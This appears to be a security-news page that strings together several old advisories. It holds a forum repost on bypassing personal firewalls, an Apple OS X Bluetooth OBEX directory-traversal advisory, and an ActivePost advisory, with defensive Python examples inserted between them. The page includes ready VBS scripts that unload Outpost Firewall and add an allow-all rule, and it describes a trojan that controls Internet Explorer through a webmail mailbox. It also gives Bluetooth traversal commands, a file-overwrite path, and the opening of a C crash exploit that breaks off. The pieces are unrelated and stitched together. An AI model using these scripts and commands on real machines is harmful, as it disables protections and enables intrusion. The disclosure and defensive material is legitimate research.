 Post subject: Bypassing client application protection techniques
 Post Posted: 27 Nov 2009, 00:37 
Posted by 5BB Member (Joined: 11 Nov 2008, 12:30; Posts: 184; Location: NYC)
Topic: Bypassing client application protection techniques
Category: Protection bypass
Affected products:
CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application Intelligence (R55) HFA 9
Microsoft Windows XP SP2
Agnitum Outpost Pro 2.1, 2.5
Tiny Firewall Pro v6.0.100
ZoneAlarm Pro with Web Filtering v4.5.594
BlackICE PC Protection 3.6
Kerio Personal Firewall 4.0
WRQ ATGuard 3.2
Authors:
offtopic, <offtopic@mail.ru>
3APA3A, <3APA3A@security.nnov.ru>

Original link:
http://www.security.nnov.ru/advisories/bypassing.asp

Special thanks to Igor U. Miturin for testing and coordinating Checkpoint issues, to Checkpoint for cooperation, and to Agnitum for the "opossum" topic public debates and some ideas.


Disclaimer:

</SARCASM>
This article is neither an attempt to teach script kiddies to write trojans nor an attempt by the authors to create one. It is a call to the security community to open a discussion on protection techniques for Internet client application security. Yes, we want to start a flame. We apologize that we did not contact vendors on many issues they may consider security vulnerabilities in their products. We believe that, to solve the discussed problem, all products must be architecturally changed, not patched to fix the illustrating PoCs. Before such an architectural change, any schoolboy with scripting skills can get access to a corporate network protected by an advertised product. We share the point of view that this should not be treated as a product vulnerability.
<SARCASM>
<APPLAUSE />
(yes, pedram).



1. Introduction

1.1 Front end security

Recent years have been revolutionary for network services infrastructure security. In addition to more secure and stable operating systems and services, we have got a lot of industrial solutions: stateful firewalls with layer 7 inspection, intrusion detection and intrusion prevention systems, reliable clusters and distributed solutions to fight DDoS attacks... And we got practically nothing in the field of client application protection. Security of client network applications, such as browsers, mail and instant messaging agents, is at the same level it was 5 years ago, and things have become worse, because these applications are now critical for business: we cannot simply stop using e-mail. <APPLAUSE />

Client application security is very important, because the same application can be used to process untrusted, potentially dangerous data as well as sensitive information. <OBJECTIONS FROM HALL, LEFT UNANSWERED />

We, like many security professionals, have a feeling that the industry is moving in the wrong direction in the area of client application security.

This article was written to demonstrate this point of view. We discuss some methods of breaking into a managed, protected corporate network without any special skills. The "exploits" illustrating this article were written with notepad.exe.

1.2 What do you use to protect your client systems against Internet attacks?

There are very few widely deployed techniques. Among them are content filtering on the corporate firewall (including antivirus filtering), personal antiviruses and personal firewalls (PFW). In addition to content filtering, personal firewalls implement integrity control for applications and the system by controlling the integrity of files, blocking access to some API functions and limiting network access to trusted applications only.

Of course, there are a few really interesting approaches to securing client applications; some of them are discussed later, but usually these techniques are not in general use.

1.3 What we will demonstrate

We will not teach you how to attack any specific client application.
The latest Mozilla experience demonstrates that a security bug in a client application can always be found for approximately $500 (should we talk about Internet Explorer? Mozilla goes at a discounted price because it is not in demand on the zombie market). We will try to illustrate that $500 is probably all that is required to get access to your network. It does not depend on the protection techniques listed above, because that protection can be bypassed by any schoolboy. If this protection is all you have, you have no protection at all. In fact, iDefense does more for the community than any PFW vendor (it's not a joke): it pays more for a newly discovered security issue than the shadow market does. At least you get an additional $500 of security this way.
<LAUGHING, OBJECTIONS (LEFT UNANSWERED), APPLAUSE />
</SARCASM>
The problem of paid vulnerability research is not as black-and-white as one might believe. Without commercial software or commercial services, freeware would not survive, because a good programmer needs money. The same tendencies exist in vulnerability research. C'est la vie. We can discuss it.
<SARCASM>
Full disclosure? Who believes in it...

So, we proudly present you how to:

- Bypass content filtering for corporate and personal firewalls (yes, again, and again and again).
- Bypass network access protection for personal firewalls.
- Bypass integrity protection for personal firewalls or antiviruses.

Above is a list of tested products. It is incomplete. Some vendors were contacted and replied. Some fixes were published, but none of the contacted vendors was able to fix all the problems discussed. We do not believe it is possible in the near future to prevent a corporate network protected only with firewalls, personal firewalls and antiviruses from being hacked by a schoolboy.

<DEEP SILENCE />
<PUTTING MEAN BLACK HATS ON />
2. Bypassing content filtering again and again and again
____________________________________________________________
Axiom: there is always one more way to bypass a content filter.

Explanation: because the content filter and the client application use different algorithms for data processing, there is always data that is processed differently by the client application and by the content filter.


2.1 Configuration used

In our configuration we used the content filtering features of 2 firewalls:
Checkpoint as the corporate firewall and Agnitum Outpost Pro as the personal firewall. Both firewalls were set to filter scripting and ActiveX elements. Using a few techniques described in [1], we wrote a set of tests to attack Internet Explorer protected by these 2 firewalls (and additionally by 2 different antiviruses) on 2 different levels in order to execute JavaScript.

2.2 Test descriptions:

2.2.1 http://www.security.nnov.ru/files/opossum/test1.html Problem with special characters (0x0B) demonstrated. [1].II.9

2.2.2 http://www.security.nnov.ru/files/opossum/test2.html Problem with RFC2781 decoding (UTF-16, little endian). [1].II.1

2.2.3 http://www.security.nnov.ru/files/opossum/test3.html Problem with RFC2781 decoding (UTF-16, big endian). [1].II.1

2.2.4 http://www.security.nnov.ru/files/opossum/test4.gif Different approach of different clients to content type definition [1].II.13

2.2.5 http://www.security.nnov.ru/files/opossum/test5.gif Same as 2.2.4 + exploitation of stream buffering.

2.2.6 http://www.security.nnov.ru/files/opossum/test6.html Problem with special characters (0x00) demonstrated. [1].II.9

2.2.7 http://www.security.nnov.ru/files/opossum/test7.asp Inability to parse UTF-7 encoding (with Content-Type) [1].II.2

2.2.8 http://www.security.nnov.ru/files/opossum/test8.html Inability to parse UTF-7 encoding (with Meta http-equiv) [1].II.2

2.2.9 http://www.security.nnov.ru/files/opossum/test9.html Inability to catch scripting via expression(). Was described by http-equiv (malware.com).

2.2.10 http://www.security.nnov.ru/files/opossum/test10.html Inability to catch scripting in styles [1].II.15

2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht Inability to parse MHT files (RFC 2557)

The content filtering bypass techniques used have been known for years. Outpost failed all tests. Checkpoint failed 2.2.2, 2.2.3, 2.2.6, 2.2.8, 2.2.9, 2.2.10 and 2.2.11.
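As an added illustration (not part of the original article or of the test pages linked above), the following Python compares a byte-pattern content filter with one that canonicalizes the body the way a permissive client does before matching. The sample bodies are constructed here to mirror the discrepancy classes listed in 2.2 (control bytes inside a tag name, UTF-16 with a byte-order mark, UTF-7); the UTF-7 sample is written by hand in RFC 2152 form rather than produced by an encoder. The function names and the UTF-7 detection heuristic are my own assumptions, not those of any product.

```python
import codecs
import re

# Constructed test bodies (not taken from the page), one per discrepancy class.
SAMPLES = {
    "plain":   b"<html><script>alert(1)</script></html>",
    # vertical tab (0x0B) and NUL (0x00) inside the tag name
    "ctrl_0b": b"<html><scr\x0bipt>alert(1)</scr\x0bipt></html>",
    "ctrl_00": b"<html><scr\x00ipt>alert(1)</script></html>",
    # RFC 2781: UTF-16 with a leading byte-order mark, little and big endian
    "utf16le": codecs.BOM_UTF16_LE + "<script>alert(1)</script>".encode("utf-16-le"),
    "utf16be": codecs.BOM_UTF16_BE + "<script>alert(1)</script>".encode("utf-16-be"),
    # RFC 2152 UTF-7, hand-written: '<' is +ADw- and '>' is +AD4-
    "utf7":    b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
    "benign":  b"<html><p>no active content here</p></html>",
}

SCRIPT_RE = re.compile(rb"<\s*script\b", re.IGNORECASE)


def naive_filter(data: bytes) -> bool:
    """Match the raw bytes, as a filter that ignores the client's decoding would."""
    return SCRIPT_RE.search(data) is not None


def normalize(data: bytes) -> bytes:
    """Canonicalize a body into the form a lenient HTML client would parse."""
    # 1. Honour a UTF-16 byte-order mark and transcode to UTF-8.
    if data.startswith(codecs.BOM_UTF16_LE):
        data = data[2:].decode("utf-16-le", "replace").encode("utf-8")
    elif data.startswith(codecs.BOM_UTF16_BE):
        data = data[2:].decode("utf-16-be", "replace").encode("utf-8")
    # 2. Heuristic (assumption for this example): an all-ASCII body containing
    #    '+' may be UTF-7; decode it if it decodes cleanly.
    elif b"+" in data and all(b < 0x80 for b in data):
        try:
            data = data.decode("utf-7").encode("utf-8")
        except UnicodeDecodeError:
            pass
    # 3. Drop control bytes (NUL, VT, ...) that a lenient parser skips inside tag names;
    #    keep ordinary whitespace so the text stays readable.
    return bytes(b for b in data if b >= 0x20 or b in b"\t\n\r")


def hardened_filter(data: bytes) -> bool:
    """Same pattern as naive_filter, applied after canonicalization."""
    return naive_filter(normalize(data))


def audit(samples=SAMPLES):
    """Run both filters over every sample; returns {name: (naive_hit, hardened_hit)}."""
    return {name: (naive_filter(body), hardened_filter(body)) for name, body in samples.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in audit().items():
        print(f"{name:8s} naive={naive!s:5s} hardened={hardened}")
```

The point of the comparison is the axiom above: the naive filter misses every variant except the plain one because it never performs the decoding steps the client performs. Canonicalization closes the listed classes but not all of them; the content-type sniffing and stream-buffering cases (2.2.4, 2.2.5) need the filter to reproduce the client's type detection as well, which this example does not attempt.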

2.3 Vendors:

Both Checkpoint and Agnitum were contacted. Checkpoint covers the issues discussed in R55 HFA10. 2.2.10 and 2.2.11 additionally require disabling CSS and MHT with special settings (I do not believe this can be accepted as a solution). Agnitum fixes very few issues in the Outpost 2.5 version. Please check your own content filter before blaming Agnitum or Checkpoint.

3. Bypassing network access restrictions with trusted application
____________________________________________________________
Axiom: Malware is indistinguishable from a user application.

The next step after a successful client application attack is usually getting remote control of the attacked computer.

A personal firewall usually restricts network access to a list of allowed applications. In addition, the integrity of these applications is controlled to prevent code insertion into the executable file. This makes it impossible to install a trojan application with direct network access.

The common idea behind bypassing this protection is using a trusted application (for example the browser) to access the external network. Usually the execution flow of the target application is hijacked with a DLL injection technique, WriteProcessMemory(), CreateRemoteThread() or something like this. You can find a description in [1] and [2]. These methods require programming skills; additionally, the personal firewall could set hooks to protect against this kind of attack. Also, the trojan application in this case should implement almost all network functions, including network topology discovery and proxy communication.

Additionally, the client application's access can be limited to a list of trusted sites. Our approach is very simple. We call it CAT (Client Application Trojaning). We use the trusted application itself without attempting to hack into its code. http://www.security.nnov.ru/files/opossum/CAT.zip is a simple PoC application. CAT uses COM to launch and control the client application (Internet Explorer). This allows practically full access to IE's resources, so we can ask IE to navigate to our site, and IE will use its proxy and other settings. We don't need to include HTTP client code in our application: IE does all the work for us. Another interesting thing is that it works via trusted sites. In our example the trojan uses the www.mail.ru server to communicate with the bad guy, but it is easy to use other trusted network services, for example Google's proxy (http://translate.google.com/translate?h ... phrack.org). Additionally, almost any search engine can be used as a proxy, with the only limitation that each iteration may require a few days.

This CAT PoC works as follows:

- It creates an IE COM object and navigates to the www.mail.ru site.
- CAT passes the username and password to the site and gets access to the mailbox.
- CAT sends a notification message "ready" to the specified mailbox.
- Every 20 seconds CAT checks the mailbox for messages with an XXX.request subject (XXX is an integer number).
- If a message appears in the mailbox, CAT reads it, deletes the message, and processes its data as a batch file.
- Execution results are sent to a predefined account.

Remove the line IE.Visible = true to run the application in hidden mode.

All this great functionality lies in 100 lines of VBS. You see, Basic can be more effective than assembler.
<ARE WE NOT SCRIPTKIDDIES IN IMAGINARY BLACK HATS?> ILOVEYOU and other scripting viruses demonstrated that an application like this can be written by 14-year-old schoolboys. VBS can be executed from Microsoft Office applications, Windows Explorer, Internet Explorer, etc. All personal firewalls tested, except Outpost 2.5, failed to detect the information leak with this script. Outpost 2.5 requires a minor modification of the original script to start one additional IE instance before launching IE via COM; the script modification is set as homework.
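The one property of the CAT PoC that survives every per-application control described above is its fixed 20-second polling interval: the requests go to a trusted site through a trusted browser, so the personal firewall sees nothing, but the proxy or corporate firewall log still shows the periodicity. The following Python is added here as an example of that detection and is not part of the CAT PoC or the article. The proxy-log lines are constructed for this example; the log format, the thresholds and the function names are assumptions.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy-log lines (not from the page): "timestamp client host path".
# One host is polled every ~20 s in the manner of the CAT PoC; the other host
# receives ordinary, irregularly spaced browsing.
LOG_LINES = """\
2009-11-27T00:00:00 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:00:03 10.0.0.5 www.example.com /index.html
2009-11-27T00:00:20 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:00:41 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:00:41 10.0.0.5 www.example.com /news/
2009-11-27T00:01:01 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:01:21 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:01:42 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:02:02 10.0.0.5 www.mail.ru /cgi-bin/checkmail
2009-11-27T00:02:17 10.0.0.5 www.example.com /about
2009-11-27T00:02:25 10.0.0.5 www.example.com /about/team
2009-11-27T00:05:03 10.0.0.5 www.example.com /contact
2009-11-27T00:05:09 10.0.0.5 www.example.com /contact/form
""".splitlines()


def parse_line(line):
    """Split one constructed log line into (timestamp, client, host, path)."""
    ts, client, host, path = line.split()
    return datetime.fromisoformat(ts), client, host, path


def find_beacons(lines, min_hits=5, max_cv=0.15):
    """Return {(client, host): mean_gap_seconds} for request series with
    near-constant spacing.

    min_hits: minimum requests to a host before a verdict is attempted.
    max_cv:   maximum coefficient of variation (stdev / mean) of the gaps;
              a script sleeping a fixed time produces a CV close to zero,
              a person clicking around does not.
    """
    times = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, client, host, _ = parse_line(line)
        times[(client, host)].append(ts)

    beacons = {}
    for key, stamps in times.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.stdev(gaps) / mean
        if cv <= max_cv:
            beacons[key] = round(mean, 1)
    return beacons


if __name__ == "__main__":
    for (client, host), period in find_beacons(LOG_LINES).items():
        print(f"{client} -> {host}: request every {period} s")
```

Tuning is the whole game here: a short window with a generous max_cv catches a plain sleep loop like the PoC's, while anything that randomizes its interval needs a longer window and a different statistic (for example, the distribution of gaps rather than their variance). The example also treats all requests to a host as one series; splitting by path keeps an auto-refreshing webmail page from masking or mimicking the poller.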

4. Bypassing personal firewall integrity protection
____________________________________________________________
Axiom: Malware is indistinguishable from the user.

This script unloads the Outpost firewall (any version):

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 100
WShell.SendKeys "{ENTER}"

Another one creates a rule to permit Internet access for all applications:

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 100
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{LEFT}{LEFT}"
WScript.Sleep 10
WShell.SendKeys "{DOWN}{DOWN}{DOWN}{DOWN}{ENTER}"
WScript.Sleep 10
WShell.SendKeys "a{ENTER}"
WScript.Sleep 10
WShell.SendKeys "{F10}{LEFT}{DOWN}"
WScript.Sleep 10
WShell.SendKeys "n"

<APPLAUSE, BRAVOS />
<MEAN HATS OFF />

5. Final noise.
____________________________________________________________
Axiom: There is no cure against unknown Malware. There are no Axioms in client application protection.

The only way to somehow secure a client application is implementing a sandbox for any application that works with untrusted data. There are attempts to implement such a sandbox without limiting its functionality, for example GeSWall [4] (by the way, this project is looking for a sponsor or investor). There are a few commercial solutions of this kind; I do not believe any of these solutions provides reliable security for Internet client applications. Virtual machines for most architectures also have known flaws. The most reliable way to protect client applications for now is the creation of an additional DMZ for application servers and providing terminal access to untrusted applications inside the DMZ. A configuration example can be found in [5]. Of course, this approach is not 100% reliable either.

That's all.

<LONG APPLAUSE, OBJECTIONS FROM HALL (LEFT UNANSWERED), A COUPLE OF WELL ANSWERED ROTTEN EGGS />

6. Links:
[1] 3APA3A, Bypassing content filtering software http://www.security.nnov.ru/advisories/content.asp
[2] Firewall leak tester http://www.firewallleaktester.com/
[3] rattle, Using Process Infection to Bypass Windows Software Firewalls http://www.phrack.org/show.php?p=62&a=13
[4] GeSWall (General Systems Wall) http://www.securesize.com/
[5] offtopic, 3APA3A, "In front of front-end security" http://www.linuxchile.cl/docs.php?op=ver&id=65

<WARNING: SARCASM tag was not open within document \>
<WARNING: SARCASM tag was not closed within document \>

--
/3APA3A

Apple OS X Multiple Bluetooth Vulnerabilities

Apple OS X's Bluetooth file exchange service is enabled by default on systems with Bluetooth capability. This could allow files to be shared without properly notifying the user. In addition, the default directory for file sharing may be used by other applications, leading to unintentional file sharing.

Vulnerable Systems:
* Mac OSX version 10.3.9 and prior

The Apple Bluetooth implementation's default behavior is that the OBEX FTP
service allows access to the /Users/Shared directory and does not
require any sort of user authentication, in addition to it being enabled
by default once a user has logged into the machine.

The following output demonstrates the ability to view files located in
/Users/Shared:
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<folder name="Faxes" created="19961103T141500Z" size="0"/>
<folder name="New Folder" created="19961103T141500Z" size="0"/>
<folder name="SC Info" created="19961103T141500Z" size="0"/>
</folder-listing>

Further, it appears that several applications use /Users/Shared as a
config file repository. For example it was found that GarageBand, Quicken,
Microsoft RDP client, Blizzard World of Warcraft and iTunes dumped random
files into /Users/Shared. Even 'SC Info.sidb', aka the iTunes database of
decryption keys, is stored under this directory, available for grabbing
over Bluetooth.

In addition to being able to browse the files located in /Users/Shared you
also have the ability to place files onto the machine in the same
directory. This may for example allow you to place potentially offensive
or illegal material onto an individual's computer.

Aside from offering OBEX File Transfer, the OSX Bluetooth interface offers
OBEX Object Push services. Object push is usually used for passing
business cards to other Bluetooth users. The object push has an option
called "Folder for Accepted Items". Under normal circumstances all files
should be dropped into this directory, however this restriction can be
bypassed. The OBEX Object Push service appears to be vulnerable to a
directory traversal attack.

The first step is obviously to check what channel OPUSH is on.
animosity:/home/kfinisterre# sdptool browse 00:11:B1:07:BE:A7
Browsing 00:11:B1:07:BE:A7 ...
Service Name: Bluetooth-PDA-Sync
Service RecHandle: 0x10004
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10002
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10003
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Fire up an rfcomm connection.
animosity:/home/kfinisterre# rfcomm connect 0 00:11:B1:07:BE:A7 10
Connected /dev/rfcomm0 to 00:11:B1:07:BE:A7 on channel 10
Press CTRL-C for hangup

Drop a file in /tmp.
kfinisterre@animosity:~/ussp-push-0.3$ ./ussp-push /dev/rfcomm0 /etc/hosts ./../../../../../../../../tmp/blah
pushing file /etc/hosts
name=/etc/hosts, size=257
Registered transport

set user data

created new objext

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ../../../../../../../../../tmp/blah, path: /etc/hosts, size:
257

At this point the Mac user is prompted by a window with the title
'Incoming File Transfer'. The options are to 'Decline' or 'Accept' with
the ability to also 'Accept all without warning' by clicking a check box.
There is a bluetooth icon with the device name of the connecting machine.
The device name information is even more useful as it can be used to
induce the user to click on the 'Accept' button.

Consider the following as an example:
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Sexy*Blonde*5*tables*over
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Critical*Apple*Bluetooth*Update
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Apple*Update*Please*Click*Accept

Luckily for an attacker only the basename() form of the file being
transferred is shown. In the above example all we would see is 'blah' as
the incoming filename. Odds are that most 'toothy' males would accept any
file from the Sexy Blonde 5 tables over.

After you coax the user to accept the file, either by clicking 'Accept' or
pressing enter, the above file will promptly be dropped in /tmp.

Kevin-Finisterres-Computer:~kevinfinisterre$ ls /tmp
501 blah mcx_compositor

In addition to the above vulnerabilities, the OBEX File Transfer service
is also vulnerable to directory traversal.

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l -c ../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<file name="4D WebSTAR Installer.log" created="19961103T141500Z"
size="195662"/>
<folder name="johnh" created="19961103T141500Z" size="0"/>
<folder name="kevinfinisterre" created="19961103T141500Z" size="0"/>
<folder name="Shared" created="19961103T141500Z" size="0"/>
<folder name="webstar" created="19961103T141500Z" size="0"/>
</folder-listing>

animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l -c ../../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<folder name="Applications" created="19961103T141500Z" size="0"/>
<folder name="automount" created="19961103T141500Z" size="0"/>
<folder name="bin" created="19961103T141500Z" size="0"/>
<folder name="cores" created="19961103T141500Z" size="0"/>
<file name="Desktop DB" created="19961103T141500Z" size="3584"/>
<file name="Desktop DF" created="19961103T141500Z" size="4482"/>
<folder name="dev" created="19961103T141500Z" size="0"/>
<folder name="Developer" created="19961103T141500Z" size="0"/>
<file name="etc" created="19961103T141500Z" size="11"/>
<folder name="Library" created="19961103T141500Z" size="0"/>
<file name="mach" created="19961103T141500Z" size="9"/>
<file name="mach.sym" created="19961103T141500Z" size="570532"/>
<file name="mach_kernel" created="19961103T141500Z" size="3863716"/>
<folder name="Network" created="19961103T141500Z" size="0"/>
<folder name="private" created="19961103T141500Z" size="0"/>
<folder name="sbin" created="19961103T141500Z" size="0"/>
<folder name="System" created="19961103T141500Z" size="0"/>
<file name="tmp" created="19961103T141500Z" size="11"/>
<folder name="Users" created="19961103T141500Z" size="0"/>
<folder name="usr" created="19961103T141500Z" size="0"/>
<file name="var" created="19961103T141500Z" size="11"/>
<folder name="Volumes" created="19961103T141500Z" size="0"/>
</folder-listing>

Disclosure Timeline:
Thu, 10 Mar 2005 Follow-up: 7841131 assigned by auto ticketing system.
Sat, 12 Mar 2005 dispute usage of /Users/Shared with bluetooth with Apple.
Thu, 17 Mar 2005 Apple is 'still investigating this issue'. Introduce
greenplaque to Apple.
Sat, 19 Mar 2005 Justin Tibbs (jay ex tizzle) pointed out World of
Warcraft uses /Users/Shared
Sat, 19 Mar 2005 JxT and KF discover and report that iTunes leaves its
auth db in /Users/Shared
Sun, 20 Mar 2005 OBEX Object Push directory traversal issues discovered
and reported.
Mon, 04 Apr 2005 OBEX File transfer daemon flaws discovered and reported
Sat, 09 Apr 2005 More Apple followups
Thu, 23 Apr 2005 AppleSeed testing begins

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1332>
CAN-2005-1332

ADDITIONAL INFORMATION

The information has been provided by kf_lists@digitalmunition.com
KF.

ActivePost Standard Password Disclosure, Directory Traversal

Multiple vulnerabilities exist in ActivePOST; exploiting them allows a malicious attacker to gather valuable information about the system and to cause the program's service to crash.

Vulnerable Systems:
* ActivePost Standard versions 3.1 and prior

Denial of Service:
The file server runs on port 6004 and is used to upload files to the server so they can then be downloaded by the target users. The vulnerability stems from the fact that an attacker is able to crash the file server by providing a filename that is longer than 4074 characters.

Directory Traversal:
This is the most critical vulnerability, as it lets an attacker upload malicious files anywhere on the disk on which ActivePost was installed. This happens by exploiting a directory traversal bug in the filename.

Example:
The following filename will overwrite the calc.exe file: /../../../windows/calc.exe
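Both OBEX services in the Apple advisory above and the ActivePost file server accept a client-supplied name and join it onto a directory without checking that the result stays inside that directory. The following Python, added as an example and not taken from either advisory or from any of the products, shows the check a server-side handler should perform before opening the file: reject NUL bytes and over-long names (the ActivePost server crashes on a long name, so the bound is part of the same validation), reject any path component made only of dots (covering both the /.. pattern and the /.... pattern the ActivePost PoC usage text mentions), and confirm that the normalized result still lies under the root. The root paths, the 255-character length bound and the function names are assumptions made for this example.

```python
import posixpath

# Assumed bound for this example; neither protocol on the page defines one.
MAX_NAME_LEN = 255


class PathEscape(ValueError):
    """Raised when a client-supplied name must not be mapped onto the share."""


def resolve_shared_path(root: str, requested: str, max_len: int = MAX_NAME_LEN) -> str:
    """Map a client-supplied name onto a file under `root`, or raise PathEscape.

    The name is always treated as relative to `root`, whatever separators or
    leading slashes the client sent, so the only way to leave the root would
    be a parent reference, and those are refused outright.
    """
    if len(requested) > max_len:
        raise PathEscape("name longer than %d characters" % max_len)
    if "\x00" in requested:
        raise PathEscape("NUL byte in name")          # would truncate a C string server-side

    # Accept both separator styles (ActivePost is a Windows service, OBEX clients vary).
    parts = [p for p in requested.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts:
        raise PathEscape("empty name")
    for part in parts:
        if set(part) == {"."}:                          # "..", "....", ...
            raise PathEscape("parent reference in name: %r" % part)

    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, *parts))
    # Defence in depth: even after the checks above, prove the result is under root.
    if posixpath.commonpath([root, candidate]) != root:
        raise PathEscape("name resolves outside the shared root")
    return candidate


def is_safe_name(root: str, requested: str) -> bool:
    """Convenience wrapper: True if resolve_shared_path accepts the name."""
    try:
        resolve_shared_path(root, requested)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # Constructed inputs modelled on the names shown in the two advisories.
    for root, name in [
        ("/Users/Shared", "Faxes/cover.txt"),
        ("/Users/Shared", "./../../../../../../../../tmp/blah"),
        ("/Users/Shared", "../"),
        ("C:/ActivePost/upload", "/../../../windows/calc.exe"),
        ("C:/ActivePost/upload", "/..../windows/calc.exe"),
    ]:
        print("%-22s %-42s -> %s" % (root, name, "ok" if is_safe_name(root, name) else "REJECT"))
```

On a real filesystem the handler should also open the file with the resolved path and then verify (via the platform's realpath or an fstat of the opened descriptor) that no symbolic link inside the share redirected it, since a pure string check cannot see links. The Object Push case in the Apple advisory additionally shows why the user prompt should display the full resolved destination rather than only the basename.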

Conference Password Disclosure:
Every time a user enters the conference menu, the server sends all the information about the available rooms, including the plain-text passwords of the conference rooms that are password protected.

The following is example data received from the server:
4703 0000 0000 0000 0000 0000 0000 0000 G...............
0000 0000 0a72 6f6f 6d20 7469 746c 6500 .....room title.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0001 3100 ..............1.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0e73 6563 7265 7470 6173 7377 6f72 ...secretpasswor <===
6400 0000 0000 0000 0000 0000 0000 0000 d...............
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0003 3832 ..............82
3100 0000 0000 0000 0000 0000 0000 0000 1...............
0000 0138 0000 0000 0000 0000 0000 0000 ...8............
0000 0000 0000 0017 6465 7363 7269 7074 ........descript
696f 6e20 6f66 2074 6865 2072 6f6f 6d00 ion of the room.
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 0000 0000 0000 0000 0000 0000 ................
0000 0000 ....

Proof of Concept:
ActivePost Denial of Service:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/actpboom.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
#endif

#define VER     "0.1"
#define PORT    6004
#define BUFFSZ  4104    /* don't modify! */
#define TIMEOUT 3

#define SEND    if(send(sd, buff, BUFFSZ, 0) \
                < 0) std_err();
#define RECV    for(tot = 0; tot < BUFFSZ; tot += len) { \
                    len = recv(sd, buff + tot, BUFFSZ - tot, 0); \
                    if(len < 0) std_err(); \
                    if(!len) break; \
                }

int timeout(int sock);
u_long resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            len,
            tot;
    u_short port = PORT;
    u_char  buff[BUFFSZ];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "ActivePost File-Server <= 3.1 crash "VER"\n"
        "by Luigi Auriemma\n"
